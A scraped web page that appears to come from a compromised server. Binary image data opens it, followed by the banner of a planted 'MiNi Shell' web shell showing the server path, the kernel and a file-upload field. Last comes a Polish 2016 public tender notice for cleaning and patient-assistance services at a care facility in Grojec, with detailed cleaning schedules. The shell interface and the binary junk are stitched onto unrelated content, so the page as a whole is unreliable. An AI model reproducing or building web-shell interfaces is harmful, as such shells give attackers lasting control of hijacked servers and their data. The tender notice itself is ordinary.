JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160407/79810-N-2016.html

<p class="kh_header"><b>Grojec: Usługa utrzymania porządku i czystości w pomieszczeniach PZOL w Grojcu oraz wykonywania czynności pomocniczych przy obsłudze pacjenta niewymagających przygotowania medycznego</b><br>
<b>Numer ogłoszenia: 79810 - 2016; data zamieszczenia: 07.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu , Aleja Ogrodowa 1, 32-615 Grojec, woj. małopolskie, tel. 33 8428136, faks 33 8428903.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzol.cba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa utrzymania porządku i czystości w pomieszczeniach PZOL w Grojcu oraz wykonywania czynności pomocniczych przy obsłudze pacjenta niewymagających przygotowania medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres usług  w PZOL w Grojcu
Usługa utrzymania porządku i czystości w pomieszczeniach PZOL w Grojcu oraz wykonywania czynności pomocniczych przy obsłudze pacjenta niewymagających przygotowania medycznego.
 W szczególności, świadczenie usług kompleksowego, specjalistycznego sprzątania i utrzymania czystości powierzchni poziomych i pionowych, sprzętu w określonych godzinach w pomieszczeniach budynku głównego  obejmujących sprzątanie codzienne  i,
inne prace nie związane z bieżącym wykonywaniem usług np. sprzątanie po awariach, remontach, w trakcie wprowadzonego reżimu sanitarnego, zwiększona częstotliwość sprzątania,
doraźna pomoc pod nadzorem personelu medycznego w utrzymaniu higieny pacjentów, karmieniu i dopajaniu chorych i w innych dodatkowych czynnościach, 
pomoc przy czynnościach pielęgnacyjnych zmiana pampersów, toaleta pośmiertna,
usuwanie odpadów medycznych i transport do punktu zbiorczego,
zmiana pościeli i ścielenie łóżek,
wynoszenie brudnej pościeli i przynoszenie czystej,
odbiór posiłków i dostarczanie do kuchni oddziałowej,
przygotowanie między posiłkami np.napojów,
porcjowanie i wydawanie posiłków chorym w asyście pielęgniarki, mycie zastaw stołowych,
obsługa urządzeń ich mycie i dezynfekcja,
pomoc przy transporcie chorych np. do gabinetów zabiegowych, na badania i konsultacje na terenie,
pomoc w transporcie zwłok do pomieszczenia pro morte,
inne prace zlecone przez Zamawiającego zgodnie z przedmiotem zamówienia.
Zakres usług sprzatania
SALE CHORYCH
Czynności wykonywane 1 raz dziennie
opróżnianie, mycie koszy z zewnątrz
mycie i dezynfekcja umywalek
mycie i dezynfekcja strefy spryskowej fliz , mycie i dezynfekcja baterii
mycie i dezynfekcja klamek
mycie i dezynfekcja strefy dotykowej drzwi
mycie i dezynfekcja dozowników z zewnątrz ,wewnątrz przy wymianie wkładów
mycie i dezynfekcja wyłączników
mycie podłóg, dezynfekcja w razie konieczności nie rzadziej niż 2x w tygodniu
mycie ram łóżek 
mycie parapetów, luster, wysięgników na kroplówki, 
mycie mebli z zewnątrz i stolików, szafek przy łóżkowych na zewnątrz
mycie i dezynfekcja urządzeń zamontowanych na ścianach
Czynności wykonywane 1 raz w tygodniu
mycie drzwi
mycie obrazów
mycie wywietrzników
mycie i dezynfekcja lamperii
mycie  kaloryferów
mycie i dezynfekcja koszy na śmieci wewnątrz
mycie i dezynfekcja szafki przyłóżkowej wewnątrz
Czynności wykonywane 2 razy w miesiącu
mycie i dezynfekcja całego łóżka, materaca 
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych 
Czynności wykonywane 2 razy do roku:o	mycie okien  szyby i framugi
mycie żaluzji, rolet, krat okiennych 
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym.
KUCHENKI ODDZIAŁOWE
Czynności wykonywane 1 raz dziennie
mycie 2 razy dziennie i dezynfekcja 1 raz dziennie podłóg
mycie 3 razy dziennie i dezynfekcja 1 raz dziennie umywalki, baterii, 
mycie i dezynfekcja fliz w strefie spryskowej
opróżnianie, mycie i dezynfekcja koszy na śmieci oraz na odpady medyczne z zewnątrz 
mycie i dezynfekcja klamek i drzwi w okolicy dotykowej oraz wyłączników
mycie i dezynfekcja podajników na ręczniki jednorazowego użycia, dozowników na mydło w płynie, dozowników na środki do odkażania rąk  wewnątrz przed każdym uzupełnieniem 
mycie i dezynfekcja szafek kuchennych oraz lodówki z zewnątrz
mycie mikrofalówki z zewnątrz i wewnątrz
odbiór brudnych naczyń po posiłku, usuwanie resztek posiłku z talerzy i ich transport do zmywaka brudną windą 3x dziennie
transport resztek pokarmów ,zlewek, po każdym posiłku do zmywaka
Czynności wykonywane 1 raz w tygodniu
mycie i dezynfekcja drzwi, fliz, szafek kuchennych wewnątrz
dezynfekcja kuchenki mikrofalowej wewnątrz
mycie i dezynfekcja koszy na śmieci wewnątrz
mycie i dezynfekcja powłok zmywalnych pionowych
Czynności wykonywane 1 raz w miesiącu
mycie i dezynfekcja lodówki wewnątrz
mycie i dezynfekcja kaloryferów
mycie wywietrzników
mycie powierzchni lamp , punktów świetlny elektrycznych i innych urządzeń 
Czynności wykonywane 2 razy do roku 
mycie okien  szyby i framugi
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
JADALNIA
Czynności wykonywane 1 raz dziennie
mycie stolików po każdym posiłku 
opróżnianie, mycie koszy z zewnątrz
mycie i dezynfekcja klamek
mycie i dezynfekcja strefy dotykowej drzwi
mycie i dezynfekcja włączników
mycie parapetów, luster,
mycie mebli z zewnątrz i krzeseł
mycie podłóg, dezynfekcja w razie konieczności nie rzadziej niż 2x w tygodniu
Czynności wykonywane 1 raz w tygodniu
mycie I dezynfekcja drzwi, fliz,
mycie i dezynfekcja powłok zmywalnych ścian
mycie i dezynfekcja koszy na śmieci wewnątrz
Czynności wykonywane 1 raz w miesiącu
mycie kaloryferów, wywietrzników
mycie powierzchni lamp , punktów świetlny elektrycznych i innych urządzeń 
Czynności wykonywane 2 razy do roku
mycie okien / szyby i framugi/
mycie żaluzji, rolet,
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
SANITARIATY, ŁAZIENKI, BRUDOWNIKI
Czynności wykonywane wg potrzeb, nie rzadziej niż 2 razy dziennie
mycie i dezynfekcja muszli klozetowej z deską, spłuczką
mycie i dezynfekcja wózka - wanny do toalety pacjentów leżących
Czynności wykonywane 1 raz dziennie
mycie i dezynfekcja podłóg
opróżnianie, mycie i dezynfekcja koszy na śmieci z zewnątrz
mycie i dezynfekcja strefy spryskowej fliz, mycie i dezynfekcja kabin prysznicowych, umywalek, baterii
mycie i dezynfekcja klamek
mycie i dezynfekcja strefy dotykowej drzwi
mycie i dezynfekcja dozowników z zewnątrz ,wewnątrz przy wymianie wkładów
mycie włączników
mycie parapetów, luster
mycie regałów, mebli z zewnątrz
Czynności wykonywane 1 raz w tygodniu
mycie drzwi w całości
mycie i dezynfekcja koszy na śmieci wewnątrz
mycie i dezynfekcja powierzchni pionowych zmywalnych
Czynności wykonywane 1 raz w miesiącu
mycie kaloryferów i wywietrzników
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych 
Czynności wykonywane 2 razy do roku
mycie okien szyby i framugi
mycie żaluzji, rolet, 
gruntowne doczyszczanie podłóg 
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
KORYTARZE NA ODDZIALE
Czynności wykonywane 1 raz dziennie
mycie podłóg, dezynfekcja w razie konieczności nie rzadziej niż 2x w tygodniu
mycie przedmiotów ruchomych znajdujących się na korytarzu stoliki, krzesła
mycie i dezynfekcja klamek, strefy dotykowej drzwi
mycie i dezynfekcja kontaktów i włączników
mycie parapetów
mycie urządzeń zamontowanych na ścianach
Czynności wykonywane 1 raz w tygodniu
mycie gablot i ram obrazów
mycie drzwi, które nie zostały uwzględnione wcześniej
mycie i dezynfekcja koszy na śmieci wewnątrz 
mycie kaloryferów i wywietrzników
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych 
Czynności wykonywane 2 razy do roku
mycie okien szyby i framugi
mycie żaluzji, rolet 
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
GABINET ZABIEGOWY
Czynności wykonywane 2 razy dziennie
mycie i dezynfekcja podłóg
mycie i dezynfekcja umywalek, baterii, klamek i drzwi w okolicy dotykowej
Czynności wykonywane 1 raz dziennie
mycie i dezynfekcja fliz w strefie spryskowej,
opróżnianie, mycie i dezynfekcja koszy na śmieci i odpady medyczne zewnątrz oraz wymiana wkładów foliowych  worków lub w zależności od potrzeby,
mycie i dezynfekcja dozowników na mydło w płynie, podajniki na ręczniki wewnątrz przed każdym uzupełnieniem i dezynfekcja,
mycie i dezynfekcja szafek z zewnątrz,
mycie i dezynfekcja parapetów, włączników i telefonów
Czynności wykonywane 1 raz w tygodniu
mycie i dezynfekcja pionowych powierzchni zmywalnych, fliz, mycie drzwi
mycie i dezynfekcja koszy na śmieci wewnątrz
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych, wywietrzników 
Czynności wykonywane 2 razy do roku
mycie okien szyby i framugi
mycie żaluzji, rolet 
gruntowne doczyszczanie podłóg
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
GABINET LEKARSKI  I  GABINETY  PIELĘGNIARSKIE
Czynności wykonywane 1 raz dziennie
mycie parapetów, luster, telefonów
mycie i dezynfekcja podłóg
mycie i dezynfekcja umywalek, baterii, dezynfekcja fliz w strefie spryskowej
opróżnianie, mycie i dezynfekcja koszy na śmieci i odpady medyczne zewnątrz 
mycie i dezynfekcja klamek i drzwi w okolicy dotykowej oraz wyłączników
mycie i dezynfekcja podajników na ręczniki jednorazowego użycia, dozowników na mydło w płynie, dozowników na środki do odkażania rąk / wewnątrz przed każdym uzupełnieniem 
Czynności wykonywane 1 raz w tygodniu
mycie drzwi
mycie mebli, lodówki z zewnątrz
mycie i dezynfekcja koszy na śmieci wewnątrz
Czynności wykonywane 1 raz w miesiącu
mycie i dezynfekcja lamperii, lub powłok zmywalnych pionowych
mycie kaloryferów i wywietrzników
mycie powierzchni lamp , punktów świetlny elektrycznych i innych urządzeń
Czynności wykonywane 2 razy do roku
mycie okien szyby i framugi
mycie żaluzji, rolet, 
gruntowne doczyszczanie podłóg
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
SALE TERAPI ZAJECIOWEJ, POKÓJ ODWIEDZIN
Czynności wykonywane 1 raz dziennie
opróżnianie, mycie koszy z zewnątrz
mycie i dezynfekcja umywalek
mycie i dezynfekcja strefy spryskowej fliz , mycie i dezynfekcja baterii
mycie i dezynfekcja klamek
mycie i dezynfekcja strefy dotykowej drzwi
mycie i dezynfekcja dozowników z zewnątrz, wewnątrz przy wymianie wkładów
mycie i dezynfekcja włączników
mycie podłóg, dezynfekcja w razie konieczności nie rzadziej niż 2x w tygodniu
mycie parapetów, luster,
mycie mebli z zewnątrz i stolików
Czynności wykonywane 1 raz w tygodniu
mycie drzwi
mycie obrazów
mycie wywietrzników
mycie i dezynfekcja koszy na śmieci wewnątrz
mycie i dezynfekcja lamperii
mycie i dezynfekcja kaloryferów
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych 
Czynności wykonywane 2 razy do roku
mycie okien szyby i framugi
mycie żaluzji, rolet,
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym.
SALA REHABILITACYJNA
Czynności wykonywane 1 raz dziennie
opróżnianie, mycie koszy z zewnątrz
mycie i dezynfekcja umywalek
mycie i dezynfekcja strefy spryskowej fliz , 
mycie i dezynfekcja baterii
mycie i dezynfekcja klamek
mycie i dezynfekcja strefy dotykowej drzwi
mycie i dezynfekcja dozowników z zewnątrz, wewnątrz przy wymianie wkładów
mycie i dezynfekcja włączników
mycie podłóg, dezynfekcja w razie konieczności nie rzadziej niż 2x w tygodniu
mycie parapetów, luster, 
mycie mebli z zewnątrz i stolików
mycie i dezynfekcja urządzeń zamontowanych na ścianach
Czynności wykonywane 1 raz w tygodniu
mycie drzwi
mycie i dezynfekcja koszy na śmieci wewnątrz
mycie i dezynfekcja powierzchni zmywalnych pionowych
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych 
mycie wywietrzników i kaloryferów
Czynności wykonywane 2 razy do roku
mycie okien  szyby i framugi
mycie żaluzji, rolet,
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym.
PUNKT ODBIORU POSIŁKÓW I ZMYWAK
Czynności wykonywane 1 raz dziennie
mycie i dezynfekcja podłóg
mycie regałów kuchennych 
mycie i dezynfekcja umywalki, baterii, 
mycie i dezynfekcja fliz w strefie spryskowej
opróżnianie, mycie i dezynfekcja koszy na śmieci
mycie i dezynfekcja klamek i drzwi w okolicy dotykowej oraz wyłączników
mycie i dezynfekcja podajników na ręczniki jednorazowego użycia, dozowników na mydło w płynie, dozowników na środki do odkażania rąk  wewnątrz przed każdym uzupełnieniem 
mycie windy czystej po wysłanie wszystkich posiłków 3 razy dziennie, dezynfekcja po wysłaniu kolacji
mycie i dezynfekcja windy brudnej po zwiezieniu wszystkich naczyń do zmywaka  3 razy dziennie
mycie i wyparzanie naczyń stołowych po każdym posiłku pacjentów 3 razy dziennie  w razie awarii dezynfekowanie wg instrukcji
mycie zmywarko-wyparzarki 3 razy dziennie
Czynności wykonywane 2 razy w miesiącu
mycie i dezynfekcja drzwi, fliz 
mycie i dezynfekcja powłok zmywalnych ścian
mycie i dezynfekcja koszy na śmieci wewnątrz
mycie powierzchni lamp , punktów świetlny elektrycznych i innych urządzeń 
gruntowne doczyszczanie podłóg
Czynności wykonywane  raz na 3 miesiące 
Dezynfekcja zmywarko wyparzarki 
Czynności wykonywane 2 razy do roku
mycie okien  szyby i framugi
gruntowne doczyszczanie podłóg
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
SEPERATKA
Czynności wykonywane 2 raz dziennie
opróżnianie, mycie i dezynfekcja koszy na zewnątrz i wewnątrz
mycie i dezynfekcja umywalek
mycie i dezynfekcja strefy spryskowej fliz , mycie i dezynfekcja baterii
mycie i dezynfekcja klamek
mycie i dezynfekcja strefy dotykowej drzwi
mycie i dezynfekcja dozowników z zewnątrz  wewnątrz przy wymianie wkładów
mycie i dezynfekcja włączników
mycie i dezynfekcja podłóg, 
mycie i dezynfekcja ram łóżek 
mycie i dezynfekcja parapetów, luster, wysięgników na kroplówki, 
mycie i dezynfekcja mebli z zewnątrz i stolików, szafek przy łóżkowych na zewnątrz
mycie i dezynfekcja urządzeń zamontowanych na ścianach
mycie i dezynfekcja muszli klozetowej z deską, spłuczką
mycie i dezynfekcja kabiny prysznicowej,
Czynności wykonywane 1 raz w tygodniu
mycie drzwi
mycie wywietrzników
mycie i dezynfekcja powierzchni pionowej ścian
mycie i dezynfekcja kaloryferów
mycie i dezynfekcja szafki przyłóżkowej wewnątrz
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych 
Czynności wykonywane 2 razy do roku
mycie okien  szyby i framugi
mycie żaluzji, rolet, 
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Dezynfekcja końcowa: po wyjściu pacjenta z izolatki,
mycie i dezynfekcja powierzchni i wszystkich sprzętów.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym.
POMIESZCZENIE DO MYCIA ŚRODKÓW TRANSPORTU I WÓZKÓW DO SPRZĄTANIA
Czynności wykonywane 1 raz dziennie
mycie i dezynfekcja podłóg
mycie i dezynfekcja umywalki, strefy spryskowej fliz i baterii, 
opróżnianie, mycie i dezynfekcja koszy na śmieci z zewnątrz
mycie i dezynfekcja klamek i drzwi w okolicy dotykowej oraz wyłączników
mycie i dezynfekcja dozowników z zewnątrz,  wewnątrz przed każdym uzupełnieniem 
mycie i dezynfekcja wózków do transportu odpadów komunalnych, medycznych, do przewozu brudnej bielizny, do sprzątania po zakończonej pracy
Czynności wykonywane 2 razy w miesiącu 
mycie i dezynfekcja drzwi, 
mycie i dezynfekcja powłok zmywalnych ścian
mycie i dezynfekcja koszy na śmieci wewnątrz
mycie powierzchni lamp , punktów świetlny elektrycznych i innych urządzeń, wywietrzników
PRO MORTE
mycie i dezynfekcja całości pomieszczenia - każdorazowo po wywiezieniu zwłok lub 1 raz w miesiącu w przypadku braku zgonów w oddziale
POMIESZCZENIA NA ODPADY MEDYCZNE 
Czynności wykonywane 1 raz dziennie
opróżnianie, mycie koszy z zewnątrz
mycie i dezynfekcja umywalek
mycie i dezynfekcja strefy spryskowej fliz , mycie i dezynfekcja baterii
mycie i dezynfekcja klamek
mycie i dezynfekcja strefy dotykowej drzwi
mycie i dezynfekcja dozowników z zewnątrz, wewnątrz przy wymianie wkładów
mycie i dezynfekcja włączników
mycie i dezynfekcja chłodni z zewnątrz
Czynności wykonywane 2 raz w miesiącu
mycie i dezynfekcja chłodni wewnątrz - każdorazowo po usunięciu odpadów raz na 2 tygodnie zgodnie z harmonogramem
Czynności wykonywane 2 razy do roku
mycie okien  szyby i framug/
mycie żaluzji, rolet, 
gruntowne doczyszczanie  podłóg 
MAGAZYN ZASOBÓW CZYSTYCH W ODDZIALE,  PUNKT APTECZNY, POMIESZCZENIA ADMINISTRACYJNE , GABINET PIELĘGNIARKI EPIDEMIOLOGICZNEJ, GABINET PIELĘGNIARKI PRZEŁOŻONEJ
Czynności wykonywane 1 raz dziennie
opróżnianie, mycie koszy z zewnątrz 
mycie i dezynfekcja umywalek, mycie baterii
mycie i dezynfekcja strefy spryskowej fliz ,
mycie i dezynfekcja strefy dotykowej drzwi, klamek, włączników
mycie dozowników z zewnątrz, wewnątrz przy wymianie wkładów
mycie powierzchni podłóg
mycie z zewnątrz lodówek
Czynności wykonywane 1 raz w tygodniu
mycie drzwi, mycie parapetów, luster i szafek
mycie gablot i ram obrazów
mycie i dezynfekcja fliz , 
mycie i dezynfekcja koszy na śmieci wewnątrz 
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni zmywalnych pionowych, kaloryferów i wywietrzników
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych
mycie lodówek wewnątrz
Czynności wykonywane 2 razy do roku
mycie okien,  szyby i framugi
mycie żaluzji, rolet 
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
KORYTARZ NA PARTERZE
Czynności wykonywane 1 raz dziennie
mycie powierzchni podłóg
opróżnianie, mycie koszy z zewnątrz
mycie i dezynfekcja strefy dotykowej drzwi, klamek, włączników
mycie i dezynfekcja windy osobowej
Czynności wykonywane 1 raz w tygodniu
mycie drzwi, mycie parapetów, luster i szafek
mycie gablot i ram obrazów
mycie i dezynfekcja koszy na śmieci wewnątrz 
dezynfekcja powierzchni podłóg
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni zmywalnych pionowych, kaloryferów i wywietrzników
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych
Czynności wykonywane 2 razy do roku
mycie okien szyby i framugi
mycie żaluzji, rolet 
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
KLATKA  SCHODOWA od parteru do II pietra
Czynności wykonywane 1 raz dziennie
mycie powierzchni podłóg
mycie i dezynfekcja strefy dotykowej, drzwi, klamek, poręczy, włączników
mycie i dezynfekcja windy osobowej
Czynności wykonywane 1 raz w tygodniu
dezynfekcja powierzchni podłóg
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych 
Czynności wykonywane 2 razy do roku
mycie okien szyby i framugi
mycie żaluzji, rolet 
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
POMIESZCZENIE  SOCJALNE  
Czynności wykonywane 1 raz dziennie
opróżnianie, mycie koszy z zewnątrz 
mycie i dezynfekcja umywalek, mycie baterii
mycie i dezynfekcja strefy spryskowej fliz ,
mycie i dezynfekcja strefy dotykowej drzwi, klamek, włączników
mycie dozowników z zewnątrz,  wewnątrz przy wymianie wkładów
mycie powierzchni podłóg
Czynności wykonywane 1 raz w tygodniu
mycie drzwi, mycie parapetów, luster i szafek
mycie gablot i ram obrazów
dezynfekcja powierzchni podłóg 
mycie i dezynfekcja koszy na śmieci wewnątrz 
Czynności wykonywane 1 raz w miesiącu
mycie powierzchni zmywalnych pionowych, kaloryferów i wywietrzników
mycie powierzchni lamp, punktów świetlnych i innych urządzeń elektrycznych
Czynności wykonywane 2 razy do roku
mycie okien   szyby i framugi
mycie żaluzji, rolet 
gruntowne doczyszczanie i konserwacja podłóg, polimeryzacja.
Poza harmonogramem obowiązuje bieżące utrzymanie czystości zgodnie z wymaganym reżimem sanitarnym
Ponadto
Wykonawca nie będzie sprzątał sal chorych, gabinetu lekarskiego gabinetu zabiegowego w następujących momentach
podczas przyjmowania pacjenta,
podczas wizyt lekarskich,
podczas wykonywanych czynnościach zabiegowych i pielęgnacyjnych u pacjentów,
Wykonawca zobowiązany jest do zabezpieczenia we własnym zakresie i na swój koszt odpowiedniej ilości sprzętu, środków dezynfekcyjnych i czystości oraz materiałów pomocniczych, a także na bieżąco uzupełnić materiały eksploatacyjne papier toaletowy, ręczniki papierowe, worki foliowe,różnego rozmiaru i koloru zgodnie ze specyfiką odpadu, mydło w płynie, środek do dezynfekcji rąk.
Przy pojemnikach na papier, mydło, środek dezynfekcyjny i ręczniki jednorazowe uzupełnienie wymiana zapasu, w razie potrzeby.
Wykonawca zobowiązany jest do przedstawienia pełnej listy preparatów myjąco-czyszczących i dezynfekcyjnych kartę charakterystyki substancji zgodnie z przepisami ustawy z dnia 25 lutego 2011r o substancjach chemicznych i ich mieszaninach.
Stosowane środki muszą również posiadać pozytywną opinię Państwowego Zakładu Higieny.
W celu prawidłowej realizacji pełnego zakresu zamówienia Wykonawca zapewni odpowiednią ilość personelu.
